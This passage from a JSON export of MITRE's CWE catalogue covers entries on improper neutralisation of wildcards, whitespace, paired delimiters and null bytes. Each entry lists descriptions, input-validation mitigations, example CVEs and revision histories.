exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0770"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Variable Name Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Variable Name Delimiter","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Variable Name Delimiter","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Variable Name Delimiter","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Variable Name Delimiters","attr":{"@_Date":"2010-04-05"}}]}},"155":{"attr":{"@_ID":"155","@_Name":"Improper Neutralization of Wildcards or Matching Symbols","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as wildcards or matching symbols when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected element may cause the process to take unexpected actions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that wildcard or matching elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0433","Description":"Bypass file restrictions using wildcard character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2002-1010","Description":"Bypass file restrictions using wildcard character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1010"},{"Reference":"CVE-2001-0334","Description":"Wildcards generate long string on expansion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0334"},{"Reference":"CVE-2004-1962","Description":"SQL injection involving \\"/**/\\" sequences.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1962"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Wildcard or Matching Element"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Wildcard or Matching Element","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Wildcard or Matching Element","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Wildcard or Matching Symbol","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Wildcards or Matching Symbols","attr":{"@_Date":"2010-04-05"}}]}},"156":{"attr":{"@_ID":"156","@_Name":"Improper Neutralization of Whitespace","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as whitespace when they are sent to a downstream component.","Extended_Description":"This can include space, tab, etc.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"White space"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that whitespace will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0637","Description":"MIE. virus protection bypass with RFC violations involving extra whitespace, or missing whitespace.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0637"},{"Reference":"CVE-2004-0942","Description":"CPU consumption with MIME headers containing lines with many space characters, probably due to algorithmic complexity (RESOURCE.AMP.ALG).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0942"},{"Reference":"CVE-2003-1015","Description":"MIE. whitespace interpreted differently by mail clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1015"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_ID":"SPEC.WHITESPACE","Entry_Name":"Whitespace"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Notes":{"Note":{"#text":"Can overlap other separator characters or delimiters.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Whitespace","attr":{"@_Date":"2008-01-30"}},{"#text":"Failure to Remove Whitespace","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Whitespace","attr":{"@_Date":"2009-03-10"}},{"#text":"Improper Sanitization of Whitespace","attr":{"@_Date":"2010-04-05"}}]}},"157":{"attr":{"@_ID":"157","@_Name":"Failure to Sanitize Paired Delimiters","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly handle the characters that are used to mark the beginning and ending of a group of entities, such as parentheses, brackets, and braces.","Extended_Description":{"xhtml:p":"Paired delimiters might include:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["< and > angle brackets","( and ) parentheses","{ and } braces","[ and ] square brackets","\\" \\" double quotes","\' \' single quotes"]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that grouping elements will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":"While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88)."},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0956","Description":"Crash via missing paired delimiter (open double-quote but no closing double-quote).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0956"},{"Reference":"CVE-2000-1165","Description":"Crash via message without closing \\">\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1165"},{"Reference":"CVE-2005-2933","Description":"Buffer overflow via mailbox name with an opening double quote but missing a closing double quote, causing a larger copy than expected.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2933"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Grouping Element / Paired Delimiter"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"15"}}},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Grouping Element / Paired Delimiter","attr":{"@_Date":"2008-04-11"}}}},"158":{"attr":{"@_ID":"158","@_Name":"Improper Neutralization of Null Byte or NUL Character","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes NUL characters or null bytes when they are sent to a downstream component.","Extended_Description":"As data is parsed, an injected NUL character or null byte may cause the software to believe the input is terminated earlier than it actually is, or otherwise cause the input to be misinterpreted. This could then be used to inject potentially dangerous input that occurs after the null byte or otherwise bypass validation routines and other protection mechanisms.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"138","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":[{"Description":"Developers should anticipate that null characters or null bytes will be injected/removed/manipulated in the input vectors of their software system. Use an appropriate combination of denylists and allowlists to ensure only valid, expected and appropriate input is processed by the system."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-1284","Description":"NUL byte in theme name causes directory traversal impact to be worse","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1284"},{"Reference":"CVE-2005-2008","Description":"Source code disclosure using trailing null.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2008"},{"Reference":"CVE-2005-3293","Description":"Source code disclosure using trailing null.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3293"},{"Reference":"CVE-2005-2061","Description":"Trailing null allows file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2061"},{"Reference":"CVE-2002-1774","Description":"Null character in MIME header allows detection bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1774"},{"Reference":"CVE-2000-0149","Description":"Web server allows remote attackers to view the source code for CGI programs via a null character (%00) at the end of a URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0149"},{"Reference":"CVE-2000-0671","Description":"Web server earlier allows allows remote attackers to bypass access restrictions, list directory contents, and read source code by inserting a null character (%00) in the URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0671"},{"Reference":"CVE-2001-0738","Description":"Logging system allows an attacker to cause a denial of service (hang) by causing null bytes to be placed in log messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0738"},{"Reference":"CVE-2001-1140","Description":"Web server allows source code for executable programs to be read via a null character (%00) at the end of a request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1140"},{"Reference":"CVE-2002-1031","Description":"Protection mechanism for limiting file access can be bypassed using a null character (%00) at the end of the directory name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1031"},{"Reference":"CVE-2002-1025","Description":"Application server allows remote attackers to read JSP source code via an encoded null byte in an HTTP GET request, which causes the server to send the .JSP file unparsed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1025"},{"Reference":"CVE-2003-0768","Description":"XSS protection mechanism only checks for sequences with an alphabetical character following a (<), so a non-alphabetical or null character (%00) following a < may be processed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0768"},{"Reference":"CVE-2004-0189","Description":"Decoding function in proxy allows regular expression bypass in ACLs via URLs with null characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0189"},{"Reference":"CVE-2005-3153","Description":"Null byte bypasses PHP regexp check (interaction error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153"},{"Reference":"CVE-2005-4155","Description":"Null byte bypasses PHP regexp check (interaction error).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Null Character / Null Byte"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":28,"Entry_Name":"Null Byte Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "NUL Character Injection", Page 411"}}},"Notes":{"Note":{"#text":"This can be a factor in multiple interpretation errors, other interaction errors, filename equivalence, etc.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, 